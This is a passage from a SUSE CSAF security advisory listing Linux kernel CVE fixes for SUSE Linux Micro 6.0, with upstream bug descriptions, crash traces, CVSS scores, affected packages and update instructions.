"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40102"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: Prevent access to vCPU events before init\n\nAnother day, another syzkaller bug. KVM erroneously allows userspace to\npend vCPU events for a vCPU that hasn\u0027t been initialized yet, leading to\nKVM interpreting a bunch of uninitialized garbage for routing /\ninjecting the exception.\n\nIn one case the injection code and the hyp disagree on whether the vCPU\nhas a 32bit EL1 and put the vCPU into an illegal mode for AArch64,\ntripping the BUG() in exception_target_el() during the next injection:\n\n kernel BUG at arch/arm64/kvm/inject_fault.c:40!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 3 UID: 0 PID: 318 Comm: repro Not tainted 6.17.0-rc4-00104-g10fd0285305d #6 PREEMPT\n Hardware name: linux,dummy-virt (DT)\n pstate: 21402009 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : exception_target_el+0x88/0x8c\n lr : pend_serror_exception+0x18/0x13c\n sp : ffff800082f03a10\n x29: ffff800082f03a10 x28: ffff0000cb132280 x27: 0000000000000000\n x26: 0000000000000000 x25: ffff0000c2a99c20 x24: 0000000000000000\n x23: 0000000000008000 x22: 0000000000000002 x21: 0000000000000004\n x20: 0000000000008000 x19: ffff0000c2a99c20 x18: 0000000000000000\n x17: 0000000000000000 x16: 0000000000000000 x15: 00000000200000c0\n x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\n x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000\n x8 : ffff800082f03af8 x7 : 0000000000000000 x6 : 0000000000000000\n x5 : ffff800080f621f0 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 000000000040009b x1 : 0000000000000003 x0 : ffff0000c2a99c20\n Call trace:\n exception_target_el+0x88/0x8c (P)\n kvm_inject_serror_esr+0x40/0x3b4\n __kvm_arm_vcpu_set_events+0xf0/0x100\n kvm_arch_vcpu_ioctl+0x180/0x9d4\n kvm_vcpu_ioctl+0x60c/0x9f4\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: f946bc01 b4fffe61 9101e020 17fffff2 (d4210000)\n\nReject the ioctls outright as no sane VMM would call these before\nKVM_ARM_VCPU_INIT anyway. Even if it did the exception would\u0027ve been\nthrown away by the eventual reset of the vCPU\u0027s state.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40102",
"url": "https://www.suse.com/security/cve/CVE-2025-40102"
},
{
"category": "external",
"summary": "SUSE Bug 1252919 for CVE-2025-40102",
"url": "https://bugzilla.suse.com/1252919"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40102"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Enforce expected_attach_type for tailcall compatibility\n\nYinhao et al. recently reported:\n\n Our fuzzer tool discovered an uninitialized pointer issue in the\n bpf_prog_test_run_xdp() function within the Linux kernel\u0027s BPF subsystem.\n This leads to a NULL pointer dereference when a BPF program attempts to\n deference the txq member of struct xdp_buff object.\n\nThe test initializes two programs of BPF_PROG_TYPE_XDP: progA acts as the\nentry point for bpf_prog_test_run_xdp() and its expected_attach_type can\nneither be of be BPF_XDP_DEVMAP nor BPF_XDP_CPUMAP. progA calls into a slot\nof a tailcall map it owns. progB\u0027s expected_attach_type must be BPF_XDP_DEVMAP\nto pass xdp_is_valid_access() validation. The program returns struct xdp_md\u0027s\negress_ifindex, and the latter is only allowed to be accessed under mentioned\nexpected_attach_type. progB is then inserted into the tailcall which progA\ncalls.\n\nThe underlying issue goes beyond XDP though. Another example are programs\nof type BPF_PROG_TYPE_CGROUP_SOCK_ADDR. sock_addr_is_valid_access() as well\nas sock_addr_func_proto() have different logic depending on the programs\u0027\nexpected_attach_type. Similarly, a program attached to BPF_CGROUP_INET4_GETPEERNAME\nshould not be allowed doing a tailcall into a program which calls bpf_bind()\nout of BPF which is only enabled for BPF_CGROUP_INET4_CONNECT.\n\nIn short, specifying expected_attach_type allows to open up additional\nfunctionality or restrictions beyond what the basic bpf_prog_type enables.\nThe use of tailcalls must not violate these constraints. Fix it by enforcing\nexpected_attach_type in __bpf_prog_map_compatible().\n\nNote that we only enforce this for tailcall maps, but not for BPF devmaps or\ncpumaps: There, the programs are invoked through dev_map_bpf_prog_run*() and\ncpu_map_bpf_prog_run*() which set up a new environment / context and therefore\nthese situations are not prone to this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40123",
"url": "https://www.suse.com/security/cve/CVE-2025-40123"
},
{
"category": "external",
"summary": "SUSE Bug 1253365 for CVE-2025-40123",
"url": "https://bugzilla.suse.com/1253365"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40123"
},
{
"cve": "CVE-2025-40134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix NULL pointer dereference in __dm_suspend()\n\nThere is a race condition between dm device suspend and table load that\ncan lead to null pointer dereference. The issue occurs when suspend is\ninvoked before table load completes:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000054\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 6 PID: 6798 Comm: dmsetup Not tainted 6.6.0-g7e52f5f0ca9b #62\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014\nRIP: 0010:blk_mq_wait_quiesce_done+0x0/0x50\nCall Trace:\n \u003cTASK\u003e\n blk_mq_quiesce_queue+0x2c/0x50\n dm_stop_queue+0xd/0x20\n __dm_suspend+0x130/0x330\n dm_suspend+0x11a/0x180\n dev_suspend+0x27e/0x560\n ctl_ioctl+0x4cf/0x850\n dm_ctl_ioctl+0xd/0x20\n vfs_ioctl+0x1d/0x50\n __se_sys_ioctl+0x9b/0xc0\n __x64_sys_ioctl+0x19/0x30\n x64_sys_call+0x2c4a/0x4620\n do_syscall_64+0x9e/0x1b0\n\nThe issue can be triggered as below:\n\nT1 \t\t\t\t\t\tT2\ndm_suspend\t\t\t\t\ttable_load\n__dm_suspend\t\t\t\t\tdm_setup_md_queue\n\t\t\t\t\t\tdm_mq_init_request_queue\n\t\t\t\t\t\tblk_mq_init_allocated_queue\n\t\t\t\t\t\t=\u003e q-\u003emq_ops = set-\u003eops; (1)\ndm_stop_queue / dm_wait_for_completion\n=\u003e q-\u003etag_set NULL pointer!\t(2)\n\t\t\t\t\t\t=\u003e q-\u003etag_set = set; (3)\n\nFix this by checking if a valid table (map) exists before performing\nrequest-based suspend and waiting for target I/O. When map is NULL,\nskip these table-dependent suspend steps.\n\nEven when map is NULL, no I/O can reach any target because there is\nno table loaded; I/O submitted in this state will fail early in the\nDM layer. Skipping the table-dependent suspend logic in this case\nis safe and avoids NULL pointer dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40134",
"url": "https://www.suse.com/security/cve/CVE-2025-40134"
},
{
"category": "external",
"summary": "SUSE Bug 1253386 for CVE-2025-40134",
"url": "https://bugzilla.suse.com/1253386"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40134"
},
{
"cve": "CVE-2025-40135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_xmit()\n\nUse RCU in ip6_xmit() in order to use dst_dev_rcu() to prevent\npossible UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40135",
"url": "https://www.suse.com/security/cve/CVE-2025-40135"
},
{
"category": "external",
"summary": "SUSE Bug 1253342 for CVE-2025-40135",
"url": "https://bugzilla.suse.com/1253342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40135"
},
{
"cve": "CVE-2025-40153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: hugetlb: avoid soft lockup when mprotect to large memory area\n\nWhen calling mprotect() to a large hugetlb memory area in our customer\u0027s\nworkload (~300GB hugetlb memory), soft lockup was observed:\n\nwatchdog: BUG: soft lockup - CPU#98 stuck for 23s! [t2_new_sysv:126916]\n\nCPU: 98 PID: 126916 Comm: t2_new_sysv Kdump: loaded Not tainted 6.17-rc7\nHardware name: GIGACOMPUTING R2A3-T40-AAV1/Jefferson CIO, BIOS 5.4.4.1 07/15/2025\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mte_clear_page_tags+0x14/0x24\nlr : mte_sync_tags+0x1c0/0x240\nsp : ffff80003150bb80\nx29: ffff80003150bb80 x28: ffff00739e9705a8 x27: 0000ffd2d6a00000\nx26: 0000ff8e4bc00000 x25: 00e80046cde00f45 x24: 0000000000022458\nx23: 0000000000000000 x22: 0000000000000004 x21: 000000011b380000\nx20: ffff000000000000 x19: 000000011b379f40 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffc875e0aa5e2c\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : fffffc01ce7a5c00 x4 : 00000000046cde00 x3 : fffffc0000000000\nx2 : 0000000000000004 x1 : 0000000000000040 x0 : ffff0046cde7c000\n\nCall trace:\n mte_clear_page_tags+0x14/0x24\n 